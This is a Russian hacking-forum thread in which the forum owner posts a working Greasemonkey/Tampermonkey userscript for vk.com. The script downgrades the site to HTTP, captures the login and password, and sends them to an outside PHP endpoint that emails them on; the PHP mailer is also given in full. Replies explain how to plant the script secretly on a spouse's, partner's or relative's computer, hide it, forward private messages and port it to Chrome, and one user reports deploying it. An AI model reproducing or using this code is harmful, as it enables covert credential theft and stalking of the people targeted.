1. На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее.
    P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.
Скрыть объявление
Привет, Незнакомец! У тебя есть возможность Оставить комментарий в теме

Получаем логин пароль от соцсетей, форумов и т.д. без взлома

Тема в разделе "H4X S0FTW4RE", создана пользователем ddd, 13 сен 2014.

  1. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Часто обращаются с просьбой в помощи получения доступа к страничке брата\сестры\любовницы\жены (нужное подчеркнуть). И выкладывать за это килограммы денег они не хотят, по этому для таких халявщиков придумал простой способ без всяких кейлогеров(палятся антивирусами).

    Нам потребуется:
    1. Компьютер с установленным на него браузером Firefox.
    2. Установленное на нем дополнение Greasemonkey
    3. Веб хостинг, на котором можно запускать php скрипты (не обязательно)
    В Greasemonkey создаем скрипт:
    Код:
    // ==UserScript==
    // @name        WebCriminal getPassVK
    // @namespace   vk
    // @include     *//vk.com/*
    // @version     1
    // @require        https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js
    // @grant       none
    // ==/UserScript==
    
    function sendMail(mail, login, pass) {
        $.ajax({
            type: 'GET',
            url: 'http://webcriminal.ru/send_mail.php', //php скрипт куда уходят данные, о нем ниже
            data: {"mail":mail, "login": login, "pass": pass},
            callbackParameter: 'callback',
            dataType: 'jsonp',
            timeout: 10000,
            success: function(json){
                //alert('success')
            },
            error: function(){
                //alert('error')
            }
        });
    }
    //если https, то редирект на http, иначе пароль не получим.
    if(window.location.protocol=="https:"){window.location.href = "http://vk.com";}
    
    $('#quick_login_button').live("click", function() {
        var login = $('input[id*="email"]').val() //выдираем  логин из поля ввода
        var pass = $('input[id*="pass"]').val() //выдираем пароль из поля ввода
        sendMail("ddd@webcriminal.ru", login, pass) //ddd@webcriminal.ru меняем на свое
        return false;
    })
    Данный скрипт посредством AJAX будет отправлять данные на PHP скрипт send_mail.php:

    PHP:
    <?
    function 
    formatstr($str)
    {
        
    $str trim($str);
        
    $str stripslashes($str);
        
    $str htmlspecialchars($str);
        return 
    $str;
    }

    $from_field "From: WebCriminal <login_and_pass@webcriminal.ru>";
    $subject "Введенные данные";
    $mail formatstr($_GET["mail"]);
    $login formatstr($_GET["login"]);
    $pass formatstr($_GET["pass"]);
    $message .= "Логин: ".$login.";";
    $message .= "Пароль: ".$pass.";";
    $mail preg_replace('/%40/''@'$mail);
    mail($mail$subject$message$from_field);
    ?>
    Данный скрипт будет отправлять на ваше мыло полученные данные.

    Итого: вы можете переделать выше описанные скрипты под получение данных с любых вебформ, и на последующую их обработку.

    P.S. скрипт send_mail.php размещенный на сайте вебкриминала не ведет логи, и еслиб даже и вел, то все равно не понятно с какого ресурса получены данные.

    P.S2. способ безпалевный, в последних версиях лисы можно спрятать значок обезьянки, чтоб не смущать подопытного пользователя. А чтобы быстро установить скрипт в Greasemonkey, достаточно сохранить его с расширением js и запустить на компьютере жерты с помощью Firefox.
     
    russtreeter52 нравится это.
  2. bat-man 0x04

    bat-man
    Регистрация:
    15 фев 2012
    Сообщения:
    10
    Симпатии:
    0
    А где скачать Greasemonkey? Я что то не пойму этот скрипт как подкинуть жертве или этот скрипт сам следит за жертвой и выдаёт пароли от мэйла либо его нужно закинуть в комп жкртвы обьясни пожалуйста я просто чайник в этом деле...
     
  3. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    @bat-man, для начала коротко об дополнении, чтоб было понятно что к чему:
    Скачивать просто. Открываешь Firefox, жмешь сочетание клавишь Ctrl+Shift+A и в открывшейся вкладке делаешь поиск дополнения(Greasemonkey), после чего устанавливаешь его. Далее нужно создать в нем выше описанный скрипт.
    Способ 100% действенный при прямом доступе к компьютеру, но конечно можно и извратиться и впарить все это удаленно. Например убедив жертву в том что с данным аддоном(Greasemonkey) его жизнь станет легче, и для примера пихнешь ему безобидный скрипт, а после того как войдешь в полное доверие дать описанный в этой теме, либо сразу дашь безобидный скрипт с перцовой начинкой. В общем все это творческий процесс :)
     
  4. bat-man 0x04

    bat-man
    Регистрация:
    15 фев 2012
    Сообщения:
    10
    Симпатии:
    0
    Извеняюсь за офтоп спасибо за ответ мне твой форум нравится если хочешь его образовать скачать уникальный дизаин ксенки там есть много плагинов в этом сайте http://hackfor.ru/ я там модератор если захочеь что либо скачать с этого сайта я дам тебе свой логин и пароль и скачивай что угодно для ксенки
    если конечно хочешь лучших плагинов в инете кроме этого сайта не нашёл когда тестировал xenforo.
     
  5. Chr()m 0x16

    Chr()m
    Регистрация:
    21 янв 2015
    Сообщения:
    17
    Симпатии:
    0
    А как от подобного защититься? Если каждый раз быть внимательным можно параноей заболеть :)
     
  6. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    @Chr()m, если именно от этого, то только используя https, если вас перебрасывает на незащищенный протокол, то стоит задуматься. Но бдительность вас не всегда выручит, если на машине стоит кейлогер и прочий софт, то вас спасет только двухэтапная авторизация или одноразовые пароли, если таковые имеются. Например в контакте это включается в настройках безопасности https://vk.com/settings?act=security если даже ваш пароль скомпрометирован, то под ним не смогут залогинется без доступа к вашему телефону.

    Еще заходите только со своих устройств, не давайте свои устройства посторонним людям, правда сниферы все равно не кто не отменял, так что ваши данные на совести сервисов которыми вы пользуетесь. Или на вас, если вы не используете подобные настройки :)
     
  7. Oper 0x02

    Oper
    Регистрация:
    15 май 2015
    Сообщения:
    3
    Симпатии:
    0
    А скрипт можно настроить так, чтоб он все отправляемые сообщения в контакте пересылал на мыло?
     
  8. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    Привет, конечно можно, только смысл? Твою почту заспамит смайликами и т.п.
    В контакте ведь
    любят
    общаться
    так
    :)
    а не предложениями как на форумах. В вашем случае нужно чтоб скрипт складировал лог переписки, и через какой-то промежуток времени скидывал его на почту.
     
    Chr()m нравится это.
  9. rus23 0x01

    rus23
    Продавец
    Регистрация:
    16 июн 2015
    Сообщения:
    1
    Симпатии:
    0
    А на Хром есть что нибудь подобное?
     
  10. Infoman IPv6

    Infoman
    WebVoice
    Регистрация:
    12 июл 2011
    Сообщения:
    184
    Симпатии:
    86
    @rus23, в хроме есть расширение Tampermonkey, думаю по аналогии, установить, создать новый скрипт и вставить код из первого сообщения.
     
  11. xrahitel 0x02

    xrahitel
    Регистрация:
    16 ноя 2015
    Сообщения:
    2
    Симпатии:
    1


    [​IMG]
     
  12. maik.blackvud 0x04

    maik.blackvud
    Регистрация:
    6 май 2014
    Сообщения:
    13
    Симпатии:
    1
    хм ну и вата это всё, я думал метод нормальный а этот метод шлак.
    Мне кажется проще, эксплоит нормальный в парить чем сидеть страдать фигнёй.
    К тому же доступ физический к пк нужен, это уже минус, если на то пошло и есть вафля можно через Акулу трафик отснифирить.
    Для таких случаев кстати есть Beef на kali linux, он куда удобнее и практичнее, к тому же не надо велосипед выдумывать..
    А если жертва на андроид? то этот метод идёт лесом просто, metasploit юзай и будет счастье тебе.
     
  13. Infoman IPv6

    Infoman
    WebVoice
    Регистрация:
    12 июл 2011
    Сообщения:
    184
    Симпатии:
    86
    С чьей позиции судишь? В начале темы же ясно сказано:
    Думаешь те кто обращаются смогут сплойт впарить? Проанализировать дамп ваершарка? Запустить кали? Да они от этих слов под кровать спрячутся :websmiles_48:
    Тут показан простой вектор атаки, для которого хватит знаний уровень чайник :websmiles_47:
     
  14. maik.blackvud 0x04

    maik.blackvud
    Регистрация:
    6 май 2014
    Сообщения:
    13
    Симпатии:
    1
    Согласен но мне кажется даже из перечисленного школьник будет в ступоре потому что не поймет как это всё заставить работать =)
     
  15. nnn Гость

    nnn
    Какими конкретно способами в настоящее время хакеры взламывают аккаунты в соцсетях? Пожалуйста, расскажите вкратце.
     
  16. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    В настоящее время все способы используют социальную инженерию, нужно как-то заставить жертву пройти на специально сформированную страницу или запустить какой-то софт на компьютере или мобильном устройстве.
     
    maik.blackvud нравится это.
  17. maik.blackvud 0x04

    maik.blackvud
    Регистрация:
    6 май 2014
    Сообщения:
    13
    Симпатии:
    1
    СИ+EXPLOIT Действует безотказно.
     
  18. russtreeter52 0x04

    russtreeter52
    Регистрация:
    9 мар 2016
    Сообщения:
    7
    Симпатии:
    0
    обьясните пожалуйста где что нужно исправить в скрипте, как получается то с какой почты на какую он отправляет?(плохо шарю)
     
  19. russtreeter52 0x04

    russtreeter52
    Регистрация:
    9 мар 2016
    Сообщения:
    7
    Симпатии:
    0
    на хост закинула send_mail и исправила
    sendMail("ddd@webcriminal.ru", login, pass) тута , скурипт запустила в tampermonkey в хром , скурипт без ошибок
     
  20. ddd (•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿

    ddd
    TS
    Команда форума WebOwner WebVoice
    Регистрация:
    5 мар 2007
    Сообщения:
    2.897
    Симпатии:
    191
    ICQ:
    943084
    @russtreeter52, в файле send_mail.php нужно только указать от кого будет ходить почта:
    Код:
    $from_field = "From: WebCriminal <login_and_pass@webcriminal.ru>";
    Вместо login_and_pass@webcriminal.ru можно указать свое или вообще не трогать.

    а в tampermonkey в вашем случае нужно поменять 2-е строки:

     
    russtreeter52 нравится это.